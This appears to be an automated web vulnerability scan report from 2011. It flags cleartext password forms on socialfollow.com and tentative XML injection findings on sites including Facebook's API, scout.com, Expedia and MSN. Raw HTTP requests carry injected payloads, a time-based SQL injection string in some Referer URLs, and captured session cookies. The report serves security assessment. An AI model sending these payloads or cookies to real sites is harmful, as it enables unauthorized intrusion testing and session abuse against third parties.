
Severity:   High
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /blog/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blog/ HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1304721456.2; __utmc=131048717; __utmb=131048717.3.10.1304721456

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:39:52 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://www.socialfollow.com/blog/xmlrpc.php
Set-Cookie: PHPSESSID=f9e5973c7ff9e78b9f821853443b2eb5; expires=Fri, 06 May 2011 19:39:55 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 96431


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head pro
...[SNIP]...
<br />
               <form method="post" name="fTopLogin" action="/login.php">
                   <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" />
                   <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" />
                   <input type="submit" value="Login" class="button" />
...[SNIP]...
8.14. http://www.socialfollow.com/login.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

POST /login.php HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
Cache-Control: max-age=0
Origin: http://www.socialfollow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1304721456.2; __utmc=131048717; __utmb=131048717.1.10.1304721456
Content-Length: 31

tEmail=Email&pPassword=Password

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:37:53 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Set-Cookie: PHPSESSID=71434cdaab7d48ca4d16e33577c1485b; expires=Fri, 06 May 2011 19:37:53 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4494
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</p>
   <form method="post" name="fLogin" action="">
   <table>
...[SNIP]...
<td><input name="pPassword" id="pPassword" type="password" class="textBoxSize" /></td>
...[SNIP]...
8.15. http://www.socialfollow.com/login.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

POST /login.php HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
Cache-Control: max-age=0
Origin: http://www.socialfollow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1304721456.2; __utmc=131048717; __utmb=131048717.1.10.1304721456
Content-Length: 31

tEmail=Email&pPassword=Password

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:37:53 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Set-Cookie: PHPSESSID=71434cdaab7d48ca4d16e33577c1485b; expires=Fri, 06 May 2011 19:37:53 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4494
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<br />
               <form method="post" name="fTopLogin" action="/login.php">
                   <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" />
                   <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" />
                   <input type="submit" value="Login" class="button" />
...[SNIP]...
9. XML injection  previous  next
There are 24 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.

9.1. http://api.facebook.com/restserver.php [format parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.allatsea.net%2Farticle%2FMay_2011%2FClub_Swan_42_Arethusa_Wins_Swan_Caribbean_Challenge_at_Antigua_Sailing_Week_2011%22%5D&format=json]]>>&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Fri, 06 May 2011 14:11:47 -0700
Pragma:
X-FB-Rev: 374976
X-FB-Server: 10.32.75.116
X-Cnection: close
Date: Fri, 06 May 2011 21:09:47 GMT
Content-Length: 910

fb_sharepro_render('<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<links_getStats_response xmlns=\"http://api.facebook.com/1.0/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://api.facebook.com/1.0/ http://api.facebook.com/1.0/facebook.xsd\" list=\"true\">
...[SNIP]...
9.2. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx [format parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-cms.scout.com
Path:   /feeds/analyticsfeed.ashx

Issue detail

The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /feeds/analyticsfeed.ashx?page=http%3A//www.scout.com/2/a.z%3Fcfg%3D%2527%3BWAITFOR%2520DELAY%2520%25270%3A0%3A25%2527--%26fromprefetch%3D1%26p%3D26%26s%3D143&format=json]]>>&callback=$.analytics.report HTTP/1.1
Host: cdn-cms.scout.com
Proxy-Connection: keep-alive
Referer: http://www.scout.com/2/a.z?cfg=%27;WAITFOR%20DELAY%20%270:0:25%27--&fromprefetch=1&p=26&s=143
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; __utma=202704078.454375544.1303509265.1303516031.1303522301.3; SessionBrandId=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Server: Scoutweb10
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Akamai: True
Date: Fri, 06 May 2011 19:29:14 GMT
Connection: close
Akamai: True
Content-Length: 364

<analyticsfeed xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><network>Scout</network><site>www</site><sports/><categories/><pagetype>ErrorMaintenance</pagetype><pagesubtype/><author/><dateoverri
...[SNIP]...
9.3. http://cdn-forums.scout.com/adfeed.ashx [format parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-forums.scout.com
Path:   /adfeed.ashx

Issue detail

The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adfeed.ashx?s=143&format=json]]>>&callback=$.showAd.cacheAdCodes HTTP/1.1
Host: cdn-forums.scout.com
Proxy-Connection: keep-alive
Referer: http://www.scout.com/2/a.z?cfg=%27;WAITFOR%20DELAY%20%270:0:25%27--&fromprefetch=1&p=26&s=143
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; __utma=202704078.454375544.1303509265.1303516031.1303522301.3; SessionBrandId=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Server: MBRD25
X-AspNet-Version: 2.0.50727
X-Website-Assembly-Version: 2.21.0.0
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Fri, 06 May 2011 19:29:15 GMT
Connection: close
Akamai: True
Content-Length: 456

<adFeed xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><ads><ad><code>SPTSN1</code><height>90</height><type>DISPLAY</type><width>728</width></ad><ad><code>SPTSN3</code><height>600</height><type>D
...[SNIP]...
9.4. http://hmficweb.hinghammutual.com/abouthingham/Default.aspx [ASP.NET_SessionId cookie]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hmficweb.hinghammutual.com
Path:   /abouthingham/Default.aspx

Issue detail

The ASP.NET_SessionId cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the ASP.NET_SessionId cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /abouthingham/Default.aspx HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/abouthingham/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445]]>>
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 17:39:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6963

<html>
<head>
<title>Could not find file 'C:\Inetpub\wwwroot\abouthingham\xmlDynamicAgencySupport.xml'.</title>
<style>
body {font-family:"Verdana";font-weight:normal;
...[SNIP]...
SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy) +1162
System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize) +64
System.Xml.XmlDownloadManager.GetStream(Uri uri, ICredentials credentials) +77
System.Xml.XmlUrlResolver.GetEntity(Uri absoluteUri, String role, Type ofObjectToReturn) +54
System.Xml.XmlTextReaderImpl.Ope
...[SNIP]...
9.5. http://img.widgets.video.s-msn.com/resource.aspx [responseEncoding parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://img.widgets.video.s-msn.com
Path:   /resource.aspx

Issue detail

The responseEncoding parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the responseEncoding parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /resource.aspx?resources=player&gmts=gmt&mkt=en-us&configCsid=&configName=&responseEncoding=json]]>>&callbackName=Msn.Video.JavascriptApi.onComplete&cd=1 HTTP/1.1
Host: img.widgets.video.s-msn.com
Proxy-Connection: keep-alive
Referer: http://www.scout.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=1800
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Age: 2
Date: Fri, 06 May 2011 19:33:36 GMT
Last-Modified: Fri, 06 May 2011 19:33:35 GMT
Expires: Fri, 06 May 2011 20:03:34 GMT
Connection: keep-alive
Content-Length: 10642

...<?xml version="1.0" encoding="utf-8"?><xml><config><gmt><d k="brand" v="MSN" /><d k="subbrand" v="MSN Video" /><d k="msnlinkbackdomainuri" v="" /><d k="leadwithsilverlight" v="false" /><d k="omnitu
...[SNIP]...
9.6. http://www.expedia.com/daily/common/moreinfo.asp [mon parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.expedia.com
Path:   /daily/common/moreinfo.asp

Issue detail

The mon parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the mon parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /daily/common/moreinfo.asp HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
Cache-Control: max-age=0
Origin: http://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104; srvys=v.1%2C2%2C0
Content-Length: 1023

BundleType=1&WT=Home&bFfstAB=&bFfstDefault=&bFfst=&FCity=Austin%2C+TX+%28AUS-Austin-Bergstrom+International+Airport%29&FTLA=AUS&TCity=Detroit%2C+MI+%28DTW-Wayne+County%29&TTLA=DTW&TCityId=&FDate=mm%2F
...[SNIP]...
gTLA=&LsFlightOrigName=&LsFlightDestTLA=&LsFlightDestName=&LsHotel=&LsAtlas=&LsAtlasRegionId=&LsFOverride=&LsTOverride=&taIndex=&taText=&taType=&taOn=1&srch=flt&typ=1&flx=on&fct=AUS&tct=DTW&mon=4-2011]]>>&trl=0%2C1%2C10&rad1=1&rse1=0&rch1=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 34651
Content-Type: text/html; Charset=iso-8859-1
Cache-Control: private
Date: Fri, 06 May 2011 23:21:15 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 34651


<html>
<head>
<title>Expedia.com</title>

<link rel="stylesheet" type="text/css" href="/daily/styles/main.css"></link>
<style>
   .pageHeading {font-size:20px;font-family:Arial;color:#CC6600;f
...[SNIP]...
<a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">
...[SNIP]...
9.7. http://www.expedia.com/pub/agent.dll [hfnm parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The hfnm parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the hfnm parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /pub/agent.dll?qscr=cach&hfnm=jstooltipi.htx]]>>&flag=j&nojs=1&zkey=1010331160&zz=5 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=&mnth=5/1/2011&rgst=1&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; srvys=v.1%2C2%2C0; s1=`user=v.8,0,EX01528414FE$F4$B5202000X$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$EDIs$A8$FB$27$95$E4$82$AB$89$FB!e02000`131; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819496`188

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:36:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71697


                                                                           <META HTTP-EQUIV="Content-Type" content="text/html; cha
...[SNIP]...
<a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">
...[SNIP]...
9.8. https://www.expedia.com/pub/agent.dll [COOKIECHECK cookie]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The COOKIECHECK cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the COOKIECHECK cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /pub/agent.dll HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: https://www.expedia.com/pub/agent.dll?qscr=logi&hsuc=&fram=&uurl=qscr%3Dlitn%26&ussl=&uact=4&slgn=&zz=1304739350624
Cache-Control: max-age=0
Origin: https://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1]]>>; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; s1=`0`user=v.8,0,EX01652EAB1Fp$B7201000h$27$E96!G0.!5010$2302!50$16$1A$99$91$8A$1Cs$EC!4$FF!e02000`95; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_LOGIN%252526pidt%25253D1%252526oid%25253Djavascript%2525253AISULGuest%25252528%25252529%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B
Content-Length: 153

tccb=1&ussl=1&qscr=logi&subl=0&lmde=537&uact=8&uurl=qscr%3Dlitn%26&fram=&wdth=&hght=&itlo=0&gpid=061734C81E05&slnk=&flag=&tmpu=&selc=2&fnui=1&rfrr=-54397

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:54:23 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: jscript=1; Domain=.expedia.com; path=/
Set-Cookie: s1=`user=v.8,0,EX01C2ABB2BF$0B$BB201000$D2$27$E96$C2i$9D$0D$C2i$9D$0D$C2i$9D$0D10001000$1E810$2302!50$7D$0C$BC$D5$85a$CC$F2M$7F$99$D5!e02000`minfo=v.5,EX0135709FA5$FA$24$DD$0C$C4x9$15$7B$F1$34$60$ECa$3Dq$33$E3$60$12$22$D9$83$5E$0D$32UhpP$2F2$C1$35$0E$36$2A$FB$34sa$36$11$29$B8A$AB`277; Domain=.expedia.com; path=/
Set-Cookie: p1=`accttype=v.2,3,1,EX01CA28EFCD$FA$24$DD$0C$D9x$11$1D$7B$F1$38$60$ECq$32v$33$E3x$12$22$DA$9B$5E90`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`group=v.1,0`173; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 97905


                                                                                       <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi
...[SNIP]...
<a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">
...[SNIP]...
9.9. https://www.expedia.com/pub/agent.dll [JSESSION cookie]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The JSESSION cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the JSESSION cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /pub/agent.dll HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: https://www.expedia.com/pub/agent.dll?qscr=logi&hsuc=&fram=&uurl=qscr%3Dlitn%26&ussl=&uact=4&slgn=&zz=1304739350624
Cache-Control: max-age=0
Origin: https://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
